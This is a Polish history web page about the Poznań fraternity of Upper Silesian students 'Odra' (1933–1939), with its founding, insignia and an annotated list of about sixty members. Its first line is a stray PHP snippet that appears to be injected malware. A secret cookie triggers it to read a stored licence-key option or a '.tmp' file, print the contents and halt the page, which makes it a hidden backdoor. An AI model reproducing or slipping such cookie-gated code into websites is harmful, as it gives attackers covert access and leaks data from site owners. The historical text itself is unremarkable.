if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Odra

Dekiel Augusta Klucznioka Nazwa:
Korpus Studentów Górnoślązaków Uniwersytetu Poznańskiego “Odra”, od 1937 Korporacja Studentów Górnoślązaków Uniwersytetu Poznańskiego “Odra”
Siedziba:
Poznań
Data powstania:
16 III 1933 r.
Barwy:
złota - niebieska - srebrna
Hasło:
“Za Odrę”
Dewiza:
„Salus Silesiae - Salus Reipublicae” (”Dobro Śląska - Dobrem Ojczyzny”)

Rys historyczny

Banda fuksowska Herberta Szyi oraz kotylion balowy Ferdynanda Kańtocha, koniec lat 30-tych.

Odra została założona dnia 16 III 1933 r. jako Korpus Studentów Górnoślązaków Uniwersytetu Poznańskiego “Odra”. Jak wskazuje nazwa była pierwotnie korporacją akademicką typu korpusowego. Senat Uniwersytetu zatwierdził statut stowarzyszenia uchwałą z dnia 15 II 1934 r., a na kuratora wyznaczył prof. Zygmunta Wojciechowskiego. W tym okresie Odra prawdopodobnie należała do Związku Polskich Korpusów Studenckich.

Legitymacja korporacyjna Wilhelma Bednorza, Poznań koniec lat 30-tych.

Dnia 17 I 1937 r. Odra dostosowała formę organizacyjną do wymogów stawianych przez Związek Polskich Korporacji Akademickich oraz pod nową nazwą Korporacja Studentów Górnoślązaków Uniwersytetu Poznańskiego “Odra” zadeklarowała chęć przystąpienia do Związku. Powodem tych decyzji miała być chęć nawiązania bliższej współpracy ze związkowymi korporacjami śląskimi. W kwietniu 1937 r. decyzją Poznańskiego Koła Międzykorporacyjnego korporacja została przyjęta do Związku (data starszeństwa związkowego: kwiecień 1937 r.). Kandydowała przy K! Baltia. Prawa członka rzeczywistego Związku uzyskała 9 XII 1938 r. (?). W ramach Związku korporacja wchodziła w skład kartelu korporacji śląskich.

Komers (?) Odry, Poznań (?) koniec lat 30-tych.

Dnia 21 VIII 1938 r. odbyło się w Chorzowie poświęcenie sztandaru Odry.

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 64 nazwiska, w tym dwóch członków honorowych.

Po wojnie odbywały się w Katowicach spotkania niewielkiej grupy członków Odry.

Odra, Rogalin 1936 r.

Lista członków

Poniższa, niekompletna lista członków Odry obejmuje ponad 60 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Brandys, ksiądz katolicki, Filister honorowy Odry [prawd. Paweł Brandys (4 grudnia 1869 w Pawłowicach-Dębinie - 24 kwietnia 1950 w Michałkowicach), absolwent Gimnazjum w Pszczynie 1892, student teologii UWr. 1892-95, od 1896 ksiądz katolicki, chadecki działacz polityczny i narodowy, w latach 1907-1918 poseł do Reichstagu z powiatu opolskiego i członek Koła Polskiego, po I wojnie światowej poseł i senator II RP, od 1922 proboszcz parafii w Michałkowicach, od 1924 dziekan powiatu piekarskiego, później kanonik i prałat, odznaczony m.in. Krzyżem Komandorskim Orderu Polonia Restituta]

  Karol Grzesik, lata międzywojenne.

 2. Karol Grzesik, (1890 w Brzeźnicy k. Raciborza - 1939), od 1919 członek Polskiej Organizacji Wojskowej Górnego Śląska, uczestnik I, II oraz III powstania śląskiego, w III powstaniu dowódca grupy “Wschód”, członek Związku Powstańców Śląskich, po wojnie naczelnik gminy Wielkie Hajduki, prezydent Chorzowa 1936-39, poseł na Sejm RP 1928-30, marszałek Sejmu Śląskiego 1935-39, odznaczony Virtuti Militari, Filister honorowy Odry

Członkowie rzeczywiści

  Jerzy Anderski, 1937 r.

 1. Jerzy Anderski, student farmacji UP, prefekt 1933/34, akt. 1933-35

  Baszton (?), 1937 r.

 2. Baszton (?),

  Sławomir Bednorz, 1937 r.

 3. Sławomir Bednorz,

  Wilhelm Bednorz (?), 1937 r.

 4. Wilhelm Bednorz, (1916-1992)

 5. Tadeusz Bocek, student Wydziału Prawno-Ekonomicznego UP, akt. 1933-35, sekretarz 1933/34 i sem. zim. 1934/35,

  Jerzy Bochenek, 1937 r.

 6. Jerzy Bochenek, student Wydziału Prawno-Ekonomicznego UP, akt. 1935-39, olderman sem. let. 1936/37, prezes sem. let. 1937/38

 7. Alojzy Brzezinka,
 8. Władysław Brzezinka, student Wydziału Prawno-Ekonomicznego UP, akt. 1935
 9. Józef Chauer, (?)

  Wiktor Depta, 1937 r.

 10. Wiktor Depta, student Wydziału Prawno-Ekonomicznego UP, c. 1934/35, akt. 1934/35-39, prezes sem. zim. i sem. let. 1938/39

  Wilhelm Fraj, 1937 r.

 11. Wilhelm Fraj, olderman sem. let. 1938/39

  Walter Grzegorzyca, 1937 r.

 12. Walter Grzegorzyca, (3 marca 1914 w Leszczynach - 29 czerwca 1967 w Londynie) s. Jana i Zofii z d. Nikiel, absolwent Gimnazjum Klasycznego w Rybniku, student prawa UP i ekonomii WSH, w czasie wojny żołnierz Brygady Podhalańskiej oraz II Korpusu, po wojnie pozostał na emigracji w Wielkiej Brytanii, pracował jako laborant na Uniwersytecie w Londynie

 13. Alfred Grzesiczek, student Wydziału Prawno-Ekonomicznego UP, akt. 1935-37, wiceprezes sem. let. 1935/36
 14. Alojzy Heliosz, student Wydziału Prawno-Ekonomicznego UP, akt. 1935
 15. Jerzy Hellman, skarbnik sem. let. 1938/39
 16. Hlondowski, (?)
 17. Wiktor Janas, student Wydziału Humanistycznego UP

  Ferdynand Kańtoch, 1937 r.

 18. Ferdynand Kańtoch, (27 maja 1913 w Leszczynach pow. Rybnik - 8 września 2000 w Czerwnionce-Leszczyny), s. Jana i Joanny z d. Nowak, absolwent stroklasycznego Państwowego Gimnazjum w Rybniku, student i absolwent (mgr inż. rolnik) Wydziału Rolno-Leśnego UP, akt. 1935-39, wiceprezes sem. zim. 1934/35, prezes sem. let. 1935/36, prezes Związku Akademików Ślązaków 1937/38, po wojnie pracownik Śląskiej Izby Roniczej w Katowicach 1938 oraz kierownik Śląskiego Związku Kółek Rolniczych, w czasie wojny obronnej 1939 komisarz wycofywania zapasów rolniczych z powiatu rybnickiego, w czasie okupacji wcielony do batalionu roboczego i praca w fabryce benzyny syntetycznej w Kędzierzynie a później w Brzegu, w 1945 na zjeżdzie chłopów w Katowicach wybrany sekretarzem i kierownikiem biura Wojewódzkiego Związku Samopomocy Chłopskiej, aresztowany i więziony przez UB 1946-50, pracownik Centrali Nasiennej w Katowicach 1950-57, Wojewódzkiego Komitetu Organizacyjnego Związku Kółek i Organizacji Rolniczych 1957-67, członek Prezydium Wojewódzkiego Związku Kółek Rolniczych 1967-76, od 1976 na emaryturze do 1991 prowadził pracując na pół etatu archiwum Związku, członek Stowarzyszenia Naukowo-Technicznego – Inżynerów i Techników Rolnictwa, w Zarządzie o/w w Katowicach i Zarządzie Głownym w Warszawie 1959-76, członek komisji ds.upowszechnienia postępu w rolnictwie w Radzie Naukowo-Technicznej przy Ministrze Rolnictwa 1969-71, pochowany na Cmentarzu w Leszczynach

  Paweł Kaszubowski, 1937 r.

 19. Paweł Kaszubowski, (16 maja 1913 w Starej Kiszewie - ) student i absolwent 1938 med. UP, akt. 1935, dr med. ŚAM 1951, internista, kardiolog, po wojnie lekarz wojskowy w Krakowie, w 1956 w Katowicach

  August Kluczniok, 1937 r.

 20. August Kluczniok, (21 sierpnia 1912 w Leszczynach - 12 marca 1967 w Rybniku) absolwent Gimnazjum Klasycznego w Rybniku, student prawa UP i ekonomii WSH, akt. 1935-37, prezes sem. let. 1936/37, doprowadził do przekształcenia się Odry w korporację akademicką, działacz Akademickiego Koła Ślązaków oraz Akademickiego Koła Rybniczan, od 1939 pracownik Generalnej Dyrekcji Kopalń Wspólnoty Interesów Górniczo-Hutniczych w Katowicach, w czasie okupacji zwolniony, pracownik Urzędu Skarbowego w Rybniku 1940-42, w 1942 wcielony do Wehrmachtu, ranny na froncie wschodnim, w niewoli amerykańskiej 1942-46, w 1946 wrócił do kraju, pracownik Centrali Zaopatrzenia Górnictwa w Katowicach, główny księgowy Rybnickiej Fabryki Maszyn 1947-67, działacz społeczny, radny gminny i powiatowy, sprawował kierownicze funkcje w Banku Spółdzielczym, Ochotniczej Straży Pożarnej, Klubie Sportowym “Piast”, pochowany na cmentarzu w Leszczynach w Województwie Śląskim

 21. Józef Koczy, (1915- 1976)

  Emil Konieczny, 1937 r.

 22. Emil Konieczny,,

  Konsek (?), 1937 r.

 23. Konsek (?),

  Romuald Kostka, 1937 r.

 24. Romuald Kostka, student UP i WSH, olderman sem. let. 1936/37

  Stanisław Koźmicki, 1937 r.

 25. Stanisław Koźmicki, (28 czerwca 1913 w Rydułtowach w pow. rybnickim - 5 lipca 1983) absolwent Gimajzum Państwowego w Rybniku 1933, student i absolwent 1939 Wydziału Rolno-Leśnego UP, akt. 1935, członek Związku Akademickiego Ślązaków i Akademickiego Koła Rybniczan, od kwietnia 1939 asystent UP przy Katedrze Technologii Rolnej na Wydziale Rolniczo-Leśym, od sierpnia do grudnia chemik w browarze parowym w Skierniewicach, od marca 1940 kierownik Wytwórni Wód Gazowanych i Rozlewni Piwa i Octu w Łowiczu, kierownik Rejonowej Szkoły Rolniczej Nr 4 w Nieborowie 1941-45, organizował także Spółdzielnię Spożywców, po wyzwoleniu od 1945 asystent w Poznaniu, wykładowca Państwowych Szkół Gospodarstwa Wiejskiego w Bojanowie, później kierownik Liceum Rolnictwa i Przemysłu Rolnego, od 1948 starszy asystenta UP, jednocześnie praca w Zakładach Piwowarskich w Poznaniu, autor szeregu artykułów z zakresu piwowarstwa, dr nauk technicznych Wyższej Szkoły Rolniczej w Poznaniu 1969, (”Badania nad przydatnością niektórych pszenic krajowych do produkcji piwa grodziskiego”)

 26. Władysław Kuboszek (Kumboszek ?), student Wydziału Prawno-Ekonomicznego UP, akt. 1935
 27. Roman Kurpas, student Wydziału Prawno-Ekonomicznego UP, akt. 1935

  Alojzy Malik, 1937 r.

 28. Alojzy Malik, (29 października 1912 w Bottrop w Westfalii - 6 października 1987), absolwent Gimnazjum w Rybniku 1933, działacz harcerski, podharcmistrz, student med. UP, sekretarz sem. let. 1937/38, lekarz, okulista, po wojnie lekarz w szpitalu przy ul. Francuskiej w Katowicach, pochowany w Katowicach

 29. Zygmunt Marcinek, ( - 6 listopada 1993 w Chorzowie)

  Marciniak (?), 1937 r.

 30. Marciniak (?),

 31. Franciszek Michalik, student Wydziału Prawno-Ekonomicznego UP, c. 1934/35

  Michałek (?), 1937 r.

 32. Michałek [być może Franciszek Michalik ?],

  Maksymilian Musioł, 1937 r.

 33. Maksymilian Musioł, (26 września 1915 w Mazurowie - ) student i absolwent 1946 med. UP, sekretarz sem. let. 1938/39, dr med. AM we Wrocławiu 1952

  Hubert Musiolik, 1937 r.

 34. Hubert Musiolik, student Wydziału Humanistycznego UP, c. 1934/35

 35. Michał Pajonk, student Wydziału Humanistycznego UP, c. 1934/35
 36. Józef Paszenda, student UP i WSH, akt. 1935
 37. Eugeniusz Peikert, (7 grudnia 1912 - ), student i absolwent 1937 med. UP, c. 1934/35, dr med. AM we Wrocławiu 1950

  Franciszek Piecha, 1937 r.

 38. Franciszek Piecha, (1919-1961) student prawa UP, sekretarz sem. let. 1937/38, więzień Oświęcimia, student i absolwent prawa na Uniwersytecie w Oxfordzie

  Franciszek Pluta, 1934 r.

 39. Franciszek Pluta, (19 listopada 1910 w Bottrop - luty 1945 w Mauthausen) absolwent Gimnazjum w Rybniku, student i absolwent 1937 Wydziału Humanistycznego UP, wiceprezes Odry 1933/34, po studiach pracownik Starostwa w Tarnowskich Górach, w czasie okupacji w konspiracji, aresztowany przez Niemców w 1943, osadzony w obozach koncentracyjnych najpierw w Auschwitz, a następnie Mauthausen-Gusen, zamordowany w komorze gazowej na kilka dni przed wyzwoleniem, (vide przedwojenny Rybnik).

  Albert Polak, 1937 r.

 40. Albert Polak,

  Wilhelm Polnik, 1937 r.

 41. Wilhelm Polnik,

  Andrzej Pucher, 1937 r.

 42. Andrzej Pucher, wiceprezes sem. let. 1936/37, olderman sem. let. 1937/38, prezes Związku Akad. Ślązaków 1938/39

  Rhode, 1937 r.

 43. Rhode,

  Edward Rosół, 1937 r.

 44. Edward Rosół,

  Franciszek Seemann, 1937 r.

 45. Franciszek Józef Seemann, (28 stycznia 1915 w Rydułtowach - 21 stycznia 1994 w Berlinie), s. Jana i Marii z d. Materny, absolwent Gimnazjum im. Powstańców Śląskich w Rybniku, student i absolwent 1939 farmacji UP, skarbnik sem. let. 1936/37, po studiach pracownik apteki w Rydułtowach, w czasie okupacji oficer AK, m.in. przygotowywał paczki z lekami i środkami sanitarnymi dla więźniów obozu koncentracyjnego w Auschwitz, po wojnie długoletni kierownik Apteki przy ul. Sobieskiego w Rybniku, wykładowca w Liceum Pielęgniarskim w Rybniku, od lat 70-tych główny inspektor d/s farmakologii dla województwa katowickiego, pochowany na Cmentarzu Św. Michała w Berlinie

  Stanisław Skupień, 1937 r.

 46. Stanisław Skupień, akt. 1935

 47. Józef Sokalla, (1913- 1957) brat Augustyna (Slensania), akt. 1935

  Konrad Starzec, 1937 r.

 48. Konrad Starzec, (1910- 1990) student i absolwent prawa UP, adwokat

  Erwin Stopa, 1937 r.

 49. Erwin Stopa, (?) [być może tożsamy z Jerzym Stoppą]

 50. Jerzy Stoppa, sekretarz sem. let. 1936/37

  Stuchlik, 1937 r.

 51. Stuchlik,

 52. Hubert Szyja, (1911 - 24 marca 1991) student i absolwent prawa UP, założyciel Odry, olderman sem. let. 1935/36

  Reinhard Szymura, 1937 r.

 53. Reinhard Szymura,

  Heinrich Ślusarek, 1937 r.

 54. Heinrich Ślusarek,

  Paweł Święty, 1937 r.

 55. Paweł Święty,

  Leon Tatarczyk, koniec lat 30-tych.

 56. Leon Tatarczyk, (7 czerwca 1909 w Bottrop w Westfalii - 25 stycznia 1985 we Wrocławiu) s. Franciszka i Franciszki z d. Moritz, absolwent Gimnazjum w Rybniku 1930, student farmacji Wydział Matematyczno-Przyrodniczy UP 1930, student i absolwent 1935 germanistyki Wydziału Humanistycznego UP, prezes 1933/34, ppor. rez., w wojnie obronnej 1939 walczył w obronie Rybnika, więzień obozów koncentracyjnych w Dachau i Mauthausen, po wojnie lektor i wykładowca na KUL i UWr. (vide przedwojenny Rybnik).

 57. Ucka, (?)
 58. Zygmunt Węgrzyk, (1915 na Śląsku - 22 marca 1998 w Poznaniu) student i absolwent 1938 ekonomii UP, akt. 1935-38, sekretarz sem. let. 1935/36, prezes sem. let. 1936/37, dyrektor Międzynarodowych Targów Poznańskich 1966-73, dyrektor poznańskiego oddziału Polskiej Izby Handlu Zagranicznego
 59. Edward Wybraniec, student Wydziału Prawno-Ekonomicznego UP

  Ernest Ziętek, 1937 r.

 60. Ernest Ziętek (Zientek), student Wydziału Humanistycznego UP

 61. Franciszek Zipser, wiceprezes sem. let. 1938/39

 62. Franciszek Żymełka (Żymełko), wiceprezes sem. let. 1937/38

Pieczęć Odry, koniec lat 30-tych.

Listę członków opracowano na podstawie:

1) K. A. Tyszka, Lista członków Polskiej Korporacji Akademickiej Odra (Poznań), (w:) Polskie Korporacje Akademickie 1997, nr 14, s. 132 i n.,
2) materiałów z Archiwum UAM,
3) fotografii z Archiwum Korporacyjnego,
4) danych encyklopedycznych i słownikowych oraz rozmów z rodzinami zmarłych członków Odry.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 14 II 2009 r.
Ostatnia zmiana: 23 X 2013 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Studentów Górnoślązaków Uniwersytetu Poznańskiego “Odra”, (na:) www.archiwumkorporacyjne.pl, stan 23 X 2013 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }